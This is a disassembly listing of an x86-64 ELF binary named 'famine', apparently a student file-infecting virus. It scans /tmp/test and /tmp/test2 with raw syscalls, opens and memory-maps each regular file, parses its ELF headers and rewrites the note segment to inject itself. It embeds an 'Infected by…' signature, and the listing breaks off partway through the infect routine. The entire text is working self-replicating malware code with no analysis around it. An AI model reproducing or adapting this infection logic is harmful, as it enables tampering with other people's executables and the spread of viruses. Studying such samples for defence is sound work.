
famine:     file format elf64-x86-64


Disassembly of section .text:

0000000000001000 <famine>:
    1000:	55                   	push   rbp
    1001:	48 89 e5             	mov    rbp,rsp
    1004:	48 81 ec 00 13 00 00 	sub    rsp,0x1300
    100b:	48 8d 35 00 00 00 00 	lea    rsi,[rip+0x0]        # 1012 <famine+0x12>
    1012:	48 89 f1             	mov    rcx,rsi
    1015:	48 89 4d c0          	mov    QWORD PTR [rbp-0x40],rcx
    1019:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    1020:	00 
    1021:	48 b8 2f 74 6d 70 2f 	movabs rax,0x7365742f706d742f
    1028:	74 65 73 
    102b:	48 89 85 60 ef ff ff 	mov    QWORD PTR [rbp-0x10a0],rax
    1032:	48 c7 85 68 ef ff ff 	mov    QWORD PTR [rbp-0x1098],0x74
    1039:	74 00 00 00 
    103d:	48 89 85 70 ef ff ff 	mov    QWORD PTR [rbp-0x1090],rax
    1044:	48 c7 85 78 ef ff ff 	mov    QWORD PTR [rbp-0x1088],0x3274
    104b:	74 32 00 00 
    104f:	48 c7 85 80 ef ff ff 	mov    QWORD PTR [rbp-0x1080],0x0
    1056:	00 00 00 00 
    105a:	48 c7 85 88 ef ff ff 	mov    QWORD PTR [rbp-0x1078],0x0
    1061:	00 00 00 00 
    1065:	48 b8 35 34 33 32 31 	movabs rax,0xa303132333435
    106c:	30 0a 00 
    106f:	48 89 85 48 ed ff ff 	mov    QWORD PTR [rbp-0x12b8],rax
    1076:	48 83 6d c0 12       	sub    QWORD PTR [rbp-0x40],0x12
    107b:	48 8d 85 00 ed ff ff 	lea    rax,[rbp-0x1300]
    1082:	48 8b 55 c0          	mov    rdx,QWORD PTR [rbp-0x40]
    1086:	48 89 d6             	mov    rsi,rdx
    1089:	48 89 c7             	mov    rdi,rax
    108c:	e8 14 03 00 00       	call   13a5 <get_profiling>
    1091:	48 8b 85 00 ed ff ff 	mov    rax,QWORD PTR [rbp-0x1300]
    1098:	48 8b 95 08 ed ff ff 	mov    rdx,QWORD PTR [rbp-0x12f8]
    109f:	48 89 85 20 ed ff ff 	mov    QWORD PTR [rbp-0x12e0],rax
    10a6:	48 89 95 28 ed ff ff 	mov    QWORD PTR [rbp-0x12d8],rdx
    10ad:	48 8b 85 10 ed ff ff 	mov    rax,QWORD PTR [rbp-0x12f0]
    10b4:	48 8b 95 18 ed ff ff 	mov    rdx,QWORD PTR [rbp-0x12e8]
    10bb:	48 89 85 30 ed ff ff 	mov    QWORD PTR [rbp-0x12d0],rax
    10c2:	48 89 95 38 ed ff ff 	mov    QWORD PTR [rbp-0x12c8],rdx
    10c9:	41 b8 01 00 00 00    	mov    r8d,0x1
    10cf:	48 8d 8d 48 ed ff ff 	lea    rcx,[rbp-0x12b8]
    10d6:	41 b9 08 00 00 00    	mov    r9d,0x8
    10dc:	41 ba 01 00 00 00    	mov    r10d,0x1
    10e2:	4c 89 ca             	mov    rdx,r9
    10e5:	48 89 ce             	mov    rsi,rcx
    10e8:	4c 89 c7             	mov    rdi,r8
    10eb:	4c 89 d0             	mov    rax,r10
    10ee:	0f 05                	syscall
    10f0:	48 89 c1             	mov    rcx,rax
    10f3:	48 89 4d f8          	mov    QWORD PTR [rbp-0x8],rcx
    10f7:	c7 45 f4 00 00 00 00 	mov    DWORD PTR [rbp-0xc],0x0
    10fe:	e9 55 02 00 00       	jmp    1358 <famine+0x358>
    1103:	48 8d 85 60 ef ff ff 	lea    rax,[rbp-0x10a0]
    110a:	8b 55 f4             	mov    edx,DWORD PTR [rbp-0xc]
    110d:	48 63 d2             	movsxd rdx,edx
    1110:	48 c1 e2 03          	shl    rdx,0x3
    1114:	48 01 d0             	add    rax,rdx
    1117:	48 89 45 b8          	mov    QWORD PTR [rbp-0x48],rax
    111b:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    111f:	48 89 c7             	mov    rdi,rax
    1122:	e8 7b 03 00 00       	call   14a2 <ft_strlen>
    1127:	48 89 45 b0          	mov    QWORD PTR [rbp-0x50],rax
    112b:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
    1132:	00 
    1133:	eb 23                	jmp    1158 <famine+0x158>
    1135:	48 8b 55 b8          	mov    rdx,QWORD PTR [rbp-0x48]
    1139:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    113d:	48 01 d0             	add    rax,rdx
    1140:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    1143:	48 8d 8d 50 ed ff ff 	lea    rcx,[rbp-0x12b0]
    114a:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    114e:	48 01 ca             	add    rdx,rcx
    1151:	88 02                	mov    BYTE PTR [rdx],al
    1153:	48 83 45 e8 01       	add    QWORD PTR [rbp-0x18],0x1
    1158:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    115c:	48 3b 45 b0          	cmp    rax,QWORD PTR [rbp-0x50]
    1160:	72 d3                	jb     1135 <famine+0x135>
    1162:	48 8d 95 50 ed ff ff 	lea    rdx,[rbp-0x12b0]
    1169:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    116d:	48 01 d0             	add    rax,rdx
    1170:	c6 00 2f             	mov    BYTE PTR [rax],0x2f
    1173:	48 8b 55 b8          	mov    rdx,QWORD PTR [rbp-0x48]
    1177:	b9 00 00 00 00       	mov    ecx,0x0
    117c:	41 b8 02 00 00 00    	mov    r8d,0x2
    1182:	48 89 ce             	mov    rsi,rcx
    1185:	48 89 d7             	mov    rdi,rdx
    1188:	4c 89 c0             	mov    rax,r8
    118b:	0f 05                	syscall
    118d:	48 89 c2             	mov    rdx,rax
    1190:	48 89 55 a8          	mov    QWORD PTR [rbp-0x58],rdx
    1194:	48 83 7d a8 00       	cmp    QWORD PTR [rbp-0x58],0x0
    1199:	0f 88 d1 01 00 00    	js     1370 <famine+0x370>
    119f:	48 8b 4d a8          	mov    rcx,QWORD PTR [rbp-0x58]
    11a3:	4c 8d 85 90 ef ff ff 	lea    r8,[rbp-0x1070]
    11aa:	41 b9 00 10 00 00    	mov    r9d,0x1000
    11b0:	41 ba 4e 00 00 00    	mov    r10d,0x4e
    11b6:	4c 89 ca             	mov    rdx,r9
    11b9:	4c 89 c6             	mov    rsi,r8
    11bc:	48 89 cf             	mov    rdi,rcx
    11bf:	4c 89 d0             	mov    rax,r10
    11c2:	0f 05                	syscall
    11c4:	48 89 c1             	mov    rcx,rax
    11c7:	48 89 4d f8          	mov    QWORD PTR [rbp-0x8],rcx
    11cb:	48 83 7d f8 00       	cmp    QWORD PTR [rbp-0x8],0x0
    11d0:	0f 88 9d 01 00 00    	js     1373 <famine+0x373>
    11d6:	e9 2f 01 00 00       	jmp    130a <famine+0x30a>
    11db:	48 c7 45 e0 00 00 00 	mov    QWORD PTR [rbp-0x20],0x0
    11e2:	00 
    11e3:	e9 e8 00 00 00       	jmp    12d0 <famine+0x2d0>
    11e8:	48 8d 95 90 ef ff ff 	lea    rdx,[rbp-0x1070]
    11ef:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    11f3:	48 01 d0             	add    rax,rdx
    11f6:	48 89 45 a0          	mov    QWORD PTR [rbp-0x60],rax
    11fa:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    11fe:	0f b7 40 10          	movzx  eax,WORD PTR [rax+0x10]
    1202:	0f b7 d0             	movzx  edx,ax
    1205:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1209:	48 01 d0             	add    rax,rdx
    120c:	48 83 e8 01          	sub    rax,0x1
    1210:	0f b6 84 05 90 ef ff 	movzx  eax,BYTE PTR [rbp+rax*1-0x1070]
    1217:	ff 
    1218:	88 45 9f             	mov    BYTE PTR [rbp-0x61],al
    121b:	80 7d 9f 08          	cmp    BYTE PTR [rbp-0x61],0x8
    121f:	0f 85 9c 00 00 00    	jne    12c1 <famine+0x2c1>
    1225:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1229:	48 83 c0 12          	add    rax,0x12
    122d:	48 89 c7             	mov    rdi,rax
    1230:	e8 6d 02 00 00       	call   14a2 <ft_strlen>
    1235:	48 89 45 90          	mov    QWORD PTR [rbp-0x70],rax
    1239:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    123d:	48 83 c0 01          	add    rax,0x1
    1241:	48 89 45 d8          	mov    QWORD PTR [rbp-0x28],rax
    1245:	eb 16                	jmp    125d <famine+0x25d>
    1247:	48 8d 95 50 ed ff ff 	lea    rdx,[rbp-0x12b0]
    124e:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1252:	48 01 d0             	add    rax,rdx
    1255:	c6 00 00             	mov    BYTE PTR [rax],0x0
    1258:	48 83 45 d8 01       	add    QWORD PTR [rbp-0x28],0x1
    125d:	48 81 7d d8 00 02 00 	cmp    QWORD PTR [rbp-0x28],0x200
    1264:	00 
    1265:	76 e0                	jbe    1247 <famine+0x247>
    1267:	48 c7 45 d0 00 00 00 	mov    QWORD PTR [rbp-0x30],0x0
    126e:	00 
    126f:	eb 2d                	jmp    129e <famine+0x29e>
    1271:	48 8b 55 b0          	mov    rdx,QWORD PTR [rbp-0x50]
    1275:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
    1279:	48 01 d0             	add    rax,rdx
    127c:	48 8d 50 01          	lea    rdx,[rax+0x1]
    1280:	48 8b 4d a0          	mov    rcx,QWORD PTR [rbp-0x60]
    1284:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
    1288:	48 01 c8             	add    rax,rcx
    128b:	48 83 c0 12          	add    rax,0x12
    128f:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    1292:	88 84 15 50 ed ff ff 	mov    BYTE PTR [rbp+rdx*1-0x12b0],al
    1299:	48 83 45 d0 01       	add    QWORD PTR [rbp-0x30],0x1
    129e:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
    12a2:	48 3b 45 90          	cmp    rax,QWORD PTR [rbp-0x70]
    12a6:	72 c9                	jb     1271 <famine+0x271>
    12a8:	48 8d 95 50 ed ff ff 	lea    rdx,[rbp-0x12b0]
    12af:	48 8d 85 20 ed ff ff 	lea    rax,[rbp-0x12e0]
    12b6:	48 89 d6             	mov    rsi,rdx
    12b9:	48 89 c7             	mov    rdi,rax
    12bc:	e8 ba 02 00 00       	call   157b <infect>
    12c1:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    12c5:	0f b7 40 10          	movzx  eax,WORD PTR [rax+0x10]
    12c9:	0f b7 c0             	movzx  eax,ax
    12cc:	48 01 45 e0          	add    QWORD PTR [rbp-0x20],rax
    12d0:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    12d4:	48 3b 45 f8          	cmp    rax,QWORD PTR [rbp-0x8]
    12d8:	0f 8c 0a ff ff ff    	jl     11e8 <famine+0x1e8>
    12de:	48 8b 4d a8          	mov    rcx,QWORD PTR [rbp-0x58]
    12e2:	4c 8d 85 90 ef ff ff 	lea    r8,[rbp-0x1070]
    12e9:	41 b9 00 10 00 00    	mov    r9d,0x1000
    12ef:	41 ba 4e 00 00 00    	mov    r10d,0x4e
    12f5:	4c 89 ca             	mov    rdx,r9
    12f8:	4c 89 c6             	mov    rsi,r8
    12fb:	48 89 cf             	mov    rdi,rcx
    12fe:	4c 89 d0             	mov    rax,r10
    1301:	0f 05                	syscall
    1303:	48 89 c1             	mov    rcx,rax
    1306:	48 89 4d f8          	mov    QWORD PTR [rbp-0x8],rcx
    130a:	48 83 7d f8 00       	cmp    QWORD PTR [rbp-0x8],0x0
    130f:	0f 8f c6 fe ff ff    	jg     11db <famine+0x1db>
    1315:	48 8b 55 a8          	mov    rdx,QWORD PTR [rbp-0x58]
    1319:	b9 03 00 00 00       	mov    ecx,0x3
    131e:	48 89 d7             	mov    rdi,rdx
    1321:	48 89 c8             	mov    rax,rcx
    1324:	0f 05                	syscall
    1326:	48 c7 45 c8 00 00 00 	mov    QWORD PTR [rbp-0x38],0x0
    132d:	00 
    132e:	eb 16                	jmp    1346 <famine+0x346>
    1330:	48 8d 95 50 ed ff ff 	lea    rdx,[rbp-0x12b0]
    1337:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    133b:	48 01 d0             	add    rax,rdx
    133e:	c6 00 00             	mov    BYTE PTR [rax],0x0
    1341:	48 83 45 c8 01       	add    QWORD PTR [rbp-0x38],0x1
    1346:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    134a:	48 83 c0 01          	add    rax,0x1
    134e:	48 39 45 c8          	cmp    QWORD PTR [rbp-0x38],rax
    1352:	72 dc                	jb     1330 <famine+0x330>
    1354:	83 45 f4 02          	add    DWORD PTR [rbp-0xc],0x2
    1358:	8b 45 f4             	mov    eax,DWORD PTR [rbp-0xc]
    135b:	48 98                	cdqe
    135d:	48 8b 84 c5 60 ef ff 	mov    rax,QWORD PTR [rbp+rax*8-0x10a0]
    1364:	ff 
    1365:	48 85 c0             	test   rax,rax
    1368:	0f 85 95 fd ff ff    	jne    1103 <famine+0x103>
    136e:	eb 04                	jmp    1374 <famine+0x374>
    1370:	90                   	nop
    1371:	eb 01                	jmp    1374 <famine+0x374>
    1373:	90                   	nop
    1374:	41 b8 01 00 00 00    	mov    r8d,0x1
    137a:	48 8d 8d 48 ed ff ff 	lea    rcx,[rbp-0x12b8]
    1381:	41 b9 08 00 00 00    	mov    r9d,0x8
    1387:	41 ba 01 00 00 00    	mov    r10d,0x1
    138d:	4c 89 ca             	mov    rdx,r9
    1390:	48 89 ce             	mov    rsi,rcx
    1393:	4c 89 c7             	mov    rdi,r8
    1396:	4c 89 d0             	mov    rax,r10
    1399:	0f 05                	syscall
    139b:	48 89 c1             	mov    rcx,rax
    139e:	48 89 4d f8          	mov    QWORD PTR [rbp-0x8],rcx
    13a2:	90                   	nop
    13a3:	c9                   	leave
    13a4:	c3                   	ret

00000000000013a5 <get_profiling>:
    13a5:	55                   	push   rbp
    13a6:	48 89 e5             	mov    rbp,rsp
    13a9:	53                   	push   rbx
    13aa:	48 89 7d b8          	mov    QWORD PTR [rbp-0x48],rdi
    13ae:	48 89 75 b0          	mov    QWORD PTR [rbp-0x50],rsi
    13b2:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
    13b9:	00 
    13ba:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    13be:	48 89 45 c0          	mov    QWORD PTR [rbp-0x40],rax
    13c2:	eb 05                	jmp    13c9 <get_profiling+0x24>
    13c4:	48 83 45 e8 01       	add    QWORD PTR [rbp-0x18],0x1
    13c9:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    13cd:	48 c1 e0 04          	shl    rax,0x4
    13d1:	48 89 c2             	mov    rdx,rax
    13d4:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    13d8:	48 01 d0             	add    rax,rdx
    13db:	48 8b 08             	mov    rcx,QWORD PTR [rax]
    13de:	48 8b 58 08          	mov    rbx,QWORD PTR [rax+0x8]
    13e2:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    13e6:	48 83 c0 01          	add    rax,0x1
    13ea:	48 c1 e0 04          	shl    rax,0x4
    13ee:	48 89 c2             	mov    rdx,rax
    13f1:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    13f5:	48 01 d0             	add    rax,rdx
    13f8:	48 8b 50 08          	mov    rdx,QWORD PTR [rax+0x8]
    13fc:	48 8b 00             	mov    rax,QWORD PTR [rax]
    13ff:	48 01 c8             	add    rax,rcx
    1402:	48 11 da             	adc    rdx,rbx
    1405:	48 09 d0             	or     rax,rdx
    1408:	48 85 c0             	test   rax,rax
    140b:	75 b7                	jne    13c4 <get_profiling+0x1f>
    140d:	48 c1 65 e8 04       	shl    QWORD PTR [rbp-0x18],0x4
    1412:	eb 05                	jmp    1419 <get_profiling+0x74>
    1414:	48 83 6d e8 01       	sub    QWORD PTR [rbp-0x18],0x1
    1419:	48 8b 55 b0          	mov    rdx,QWORD PTR [rbp-0x50]
    141d:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    1421:	48 01 d0             	add    rax,rdx
    1424:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    1427:	84 c0                	test   al,al
    1429:	74 e9                	je     1414 <get_profiling+0x6f>
    142b:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    142f:	48 83 c0 01          	add    rax,0x1
    1433:	48 89 45 c8          	mov    QWORD PTR [rbp-0x38],rax
    1437:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    143b:	48 8d 50 20          	lea    rdx,[rax+0x20]
    143f:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    1443:	48 01 d0             	add    rax,rdx
    1446:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    1449:	84 c0                	test   al,al
    144b:	75 11                	jne    145e <get_profiling+0xb9>
    144d:	c6 45 d8 01          	mov    BYTE PTR [rbp-0x28],0x1
    1451:	48 8d 05 a8 1b 00 00 	lea    rax,[rip+0x1ba8]        # 3000 <_virus+0xf65>
    1458:	48 89 45 d0          	mov    QWORD PTR [rbp-0x30],rax
    145c:	eb 17                	jmp    1475 <get_profiling+0xd0>
    145e:	c6 45 d8 00          	mov    BYTE PTR [rbp-0x28],0x0
    1462:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1466:	48 8d 50 20          	lea    rdx,[rax+0x20]
    146a:	48 8b 45 b0          	mov    rax,QWORD PTR [rbp-0x50]
    146e:	48 01 d0             	add    rax,rdx
    1471:	48 89 45 d0          	mov    QWORD PTR [rbp-0x30],rax
    1475:	48 8b 4d b8          	mov    rcx,QWORD PTR [rbp-0x48]
    1479:	48 8b 45 c0          	mov    rax,QWORD PTR [rbp-0x40]
    147d:	48 8b 55 c8          	mov    rdx,QWORD PTR [rbp-0x38]
    1481:	48 89 01             	mov    QWORD PTR [rcx],rax
    1484:	48 89 51 08          	mov    QWORD PTR [rcx+0x8],rdx
    1488:	48 8b 45 d0          	mov    rax,QWORD PTR [rbp-0x30]
    148c:	48 8b 55 d8          	mov    rdx,QWORD PTR [rbp-0x28]
    1490:	48 89 41 10          	mov    QWORD PTR [rcx+0x10],rax
    1494:	48 89 51 18          	mov    QWORD PTR [rcx+0x18],rdx
    1498:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    149c:	48 8b 5d f8          	mov    rbx,QWORD PTR [rbp-0x8]
    14a0:	c9                   	leave
    14a1:	c3                   	ret

00000000000014a2 <ft_strlen>:
    14a2:	55                   	push   rbp
    14a3:	48 89 e5             	mov    rbp,rsp
    14a6:	48 89 7d e8          	mov    QWORD PTR [rbp-0x18],rdi
    14aa:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    14b1:	00 
    14b2:	eb 05                	jmp    14b9 <ft_strlen+0x17>
    14b4:	48 83 45 f8 01       	add    QWORD PTR [rbp-0x8],0x1
    14b9:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    14bd:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    14c1:	48 01 d0             	add    rax,rdx
    14c4:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    14c7:	84 c0                	test   al,al
    14c9:	75 e9                	jne    14b4 <ft_strlen+0x12>
    14cb:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    14cf:	5d                   	pop    rbp
    14d0:	c3                   	ret

00000000000014d1 <ft_memcmp>:
    14d1:	55                   	push   rbp
    14d2:	48 89 e5             	mov    rbp,rsp
    14d5:	48 89 7d e8          	mov    QWORD PTR [rbp-0x18],rdi
    14d9:	48 89 75 e0          	mov    QWORD PTR [rbp-0x20],rsi
    14dd:	48 89 55 d8          	mov    QWORD PTR [rbp-0x28],rdx
    14e1:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    14e8:	00 
    14e9:	eb 2c                	jmp    1517 <ft_memcmp+0x46>
    14eb:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    14ef:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    14f3:	48 01 d0             	add    rax,rdx
    14f6:	0f b6 10             	movzx  edx,BYTE PTR [rax]
    14f9:	48 8b 4d e0          	mov    rcx,QWORD PTR [rbp-0x20]
    14fd:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    1501:	48 01 c8             	add    rax,rcx
    1504:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    1507:	38 c2                	cmp    dl,al
    1509:	74 07                	je     1512 <ft_memcmp+0x41>
    150b:	b8 00 00 00 00       	mov    eax,0x0
    1510:	eb 14                	jmp    1526 <ft_memcmp+0x55>
    1512:	48 83 45 f8 01       	add    QWORD PTR [rbp-0x8],0x1
    1517:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    151b:	48 3b 45 d8          	cmp    rax,QWORD PTR [rbp-0x28]
    151f:	72 ca                	jb     14eb <ft_memcmp+0x1a>
    1521:	b8 01 00 00 00       	mov    eax,0x1
    1526:	5d                   	pop    rbp
    1527:	c3                   	ret

0000000000001528 <ft_memcpy>:
    1528:	55                   	push   rbp
    1529:	48 89 e5             	mov    rbp,rsp
    152c:	48 89 7d e8          	mov    QWORD PTR [rbp-0x18],rdi
    1530:	48 89 75 e0          	mov    QWORD PTR [rbp-0x20],rsi
    1534:	48 89 55 d8          	mov    QWORD PTR [rbp-0x28],rdx
    1538:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    153f:	00 
    1540:	eb 20                	jmp    1562 <ft_memcpy+0x3a>
    1542:	48 8b 55 e0          	mov    rdx,QWORD PTR [rbp-0x20]
    1546:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    154a:	48 01 d0             	add    rax,rdx
    154d:	48 8b 4d e8          	mov    rcx,QWORD PTR [rbp-0x18]
    1551:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
    1555:	48 01 ca             	add    rdx,rcx
    1558:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    155b:	88 02                	mov    BYTE PTR [rdx],al
    155d:	48 83 45 f8 01       	add    QWORD PTR [rbp-0x8],0x1
    1562:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    1566:	48 3b 45 d8          	cmp    rax,QWORD PTR [rbp-0x28]
    156a:	72 d6                	jb     1542 <ft_memcpy+0x1a>
    156c:	90                   	nop
    156d:	90                   	nop
    156e:	5d                   	pop    rbp
    156f:	c3                   	ret

0000000000001570 <print_data>:
    1570:	55                   	push   rbp
    1571:	48 89 e5             	mov    rbp,rsp
    1574:	48 89 7d f8          	mov    QWORD PTR [rbp-0x8],rdi
    1578:	90                   	nop
    1579:	5d                   	pop    rbp
    157a:	c3                   	ret

000000000000157b <infect>:
    157b:	55                   	push   rbp
    157c:	48 89 e5             	mov    rbp,rsp
    157f:	41 56                	push   r14
    1581:	41 55                	push   r13
    1583:	41 54                	push   r12
    1585:	53                   	push   rbx
    1586:	48 81 ec 70 01 00 00 	sub    rsp,0x170
    158d:	48 89 bd 78 fe ff ff 	mov    QWORD PTR [rbp-0x188],rdi
    1594:	48 89 b5 70 fe ff ff 	mov    QWORD PTR [rbp-0x190],rsi
    159b:	48 c7 45 d8 00 00 00 	mov    QWORD PTR [rbp-0x28],0x0
    15a2:	00 
    15a3:	48 c7 45 d0 00 00 00 	mov    QWORD PTR [rbp-0x30],0x0
    15aa:	00 
    15ab:	48 8d 95 30 ff ff ff 	lea    rdx,[rbp-0xd0]
    15b2:	b8 00 00 00 00       	mov    eax,0x0
    15b7:	b9 12 00 00 00       	mov    ecx,0x12
    15bc:	48 89 d7             	mov    rdi,rdx
    15bf:	f3 48 ab             	rep stos QWORD PTR es:[rdi],rax
    15c2:	48 c7 45 c8 00 00 00 	mov    QWORD PTR [rbp-0x38],0x0
    15c9:	00 
    15ca:	48 b8 49 6e 66 65 63 	movabs rax,0x6465746365666e49
    15d1:	74 65 64 
    15d4:	48 89 85 90 fe ff ff 	mov    QWORD PTR [rbp-0x170],rax
    15db:	48 b8 20 62 79 20 61 	movabs rax,0x6562646120796220
    15e2:	64 62 65 
    15e5:	48 89 85 98 fe ff ff 	mov    QWORD PTR [rbp-0x168],rax
    15ec:	48 b8 6e 2d 6d 63 20 	movabs rax,0x646e6120636d2d6e
    15f3:	61 6e 64 
    15f6:	48 89 85 a0 fe ff ff 	mov    QWORD PTR [rbp-0x160],rax
    15fd:	48 b8 20 6e 67 75 69 	movabs rax,0x6472616975676e20
    1604:	61 72 64 
    1607:	48 89 85 a8 fe ff ff 	mov    QWORD PTR [rbp-0x158],rax
    160e:	48 c7 85 b0 fe ff ff 	mov    QWORD PTR [rbp-0x150],0x293b20
    1615:	20 3b 29 00 
    1619:	48 8b 95 70 fe ff ff 	mov    rdx,QWORD PTR [rbp-0x190]
    1620:	b9 02 00 00 00       	mov    ecx,0x2
    1625:	41 b8 02 00 00 00    	mov    r8d,0x2
    162b:	48 89 ce             	mov    rsi,rcx
    162e:	48 89 d7             	mov    rdi,rdx
    1631:	4c 89 c0             	mov    rax,r8
    1634:	0f 05                	syscall
    1636:	48 89 c2             	mov    rdx,rax
    1639:	48 89 55 d8          	mov    QWORD PTR [rbp-0x28],rdx
    163d:	48 83 7d d8 00       	cmp    QWORD PTR [rbp-0x28],0x0
    1642:	79 0a                	jns    164e <infect+0xd3>
    1644:	b8 00 00 00 00       	mov    eax,0x0
    1649:	e9 5b 02 00 00       	jmp    18a9 <infect+0x32e>
    164e:	48 8b 55 d8          	mov    rdx,QWORD PTR [rbp-0x28]
    1652:	48 8d 8d 30 ff ff ff 	lea    rcx,[rbp-0xd0]
    1659:	41 b8 05 00 00 00    	mov    r8d,0x5
    165f:	48 89 ce             	mov    rsi,rcx
    1662:	48 89 d7             	mov    rdi,rdx
    1665:	4c 89 c0             	mov    rax,r8
    1668:	0f 05                	syscall
    166a:	48 89 c2             	mov    rdx,rax
    166d:	48 89 55 d0          	mov    QWORD PTR [rbp-0x30],rdx
    1671:	48 8b 85 60 ff ff ff 	mov    rax,QWORD PTR [rbp-0xa0]
    1678:	48 83 f8 3f          	cmp    rax,0x3f
    167c:	0f 8e e4 01 00 00    	jle    1866 <infect+0x2eb>
    1682:	48 8b 85 60 ff ff ff 	mov    rax,QWORD PTR [rbp-0xa0]
    1689:	48 89 c3             	mov    rbx,rax
    168c:	48 8b 4d d8          	mov    rcx,QWORD PTR [rbp-0x28]
    1690:	41 bb 00 00 00 00    	mov    r11d,0x0
    1696:	41 bc 03 00 00 00    	mov    r12d,0x3
    169c:	41 bd 01 00 00 00    	mov    r13d,0x1
    16a2:	41 be 00 00 00 00    	mov    r14d,0x0
    16a8:	4d 89 f1             	mov    r9,r14
    16ab:	49 89 c8             	mov    r8,rcx
    16ae:	4d 89 ea             	mov    r10,r13
    16b1:	4c 89 e2             	mov    rdx,r12
    16b4:	48 89 de             	mov    rsi,rbx
    16b7:	4c 89 df             	mov    rdi,r11
    16ba:	48 c7 c0 09 00 00 00 	mov    rax,0x9
    16c1:	0f 05                	syscall
    16c3:	48 89 c1             	mov    rcx,rax
    16c6:	48 89 4d c8          	mov    QWORD PTR [rbp-0x38],rcx
    16ca:	48 83 7d c8 ff       	cmp    QWORD PTR [rbp-0x38],0xffffffffffffffff
    16cf:	75 0a                	jne    16db <infect+0x160>
    16d1:	b8 01 00 00 00       	mov    eax,0x1
    16d6:	e9 ce 01 00 00       	jmp    18a9 <infect+0x32e>
    16db:	48 8b 85 60 ff ff ff 	mov    rax,QWORD PTR [rbp-0xa0]
    16e2:	48 89 85 18 ff ff ff 	mov    QWORD PTR [rbp-0xe8],rax
    16e9:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    16ed:	48 89 85 e0 fe ff ff 	mov    QWORD PTR [rbp-0x120],rax
    16f4:	48 8d 95 c0 fe ff ff 	lea    rdx,[rbp-0x140]
    16fb:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    16ff:	48 89 d6             	mov    rsi,rdx
    1702:	48 89 c7             	mov    rdi,rax
    1705:	e8 af 01 00 00       	call   18b9 <parsing>
    170a:	83 f0 01             	xor    eax,0x1
    170d:	84 c0                	test   al,al
    170f:	0f 85 54 01 00 00    	jne    1869 <infect+0x2ee>
    1715:	48 8d 95 c0 fe ff ff 	lea    rdx,[rbp-0x140]
    171c:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    1723:	48 89 d6             	mov    rsi,rdx
    1726:	48 89 c7             	mov    rdi,rax
    1729:	e8 d0 02 00 00       	call   19fe <change_note_segment>
    172e:	48 8d 85 c0 fe ff ff 	lea    rax,[rbp-0x140]
    1735:	48 89 c7             	mov    rdi,rax
    1738:	e8 33 fe ff ff       	call   1570 <print_data>
    173d:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    1744:	48 8b 50 08          	mov    rdx,QWORD PTR [rax+0x8]
    1748:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    174f:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1752:	48 8b b5 d8 fe ff ff 	mov    rsi,QWORD PTR [rbp-0x128]
    1759:	48 8b 8d f8 fe ff ff 	mov    rcx,QWORD PTR [rbp-0x108]
    1760:	48 01 f1             	add    rcx,rsi
    1763:	48 89 c6             	mov    rsi,rax
    1766:	48 89 cf             	mov    rdi,rcx
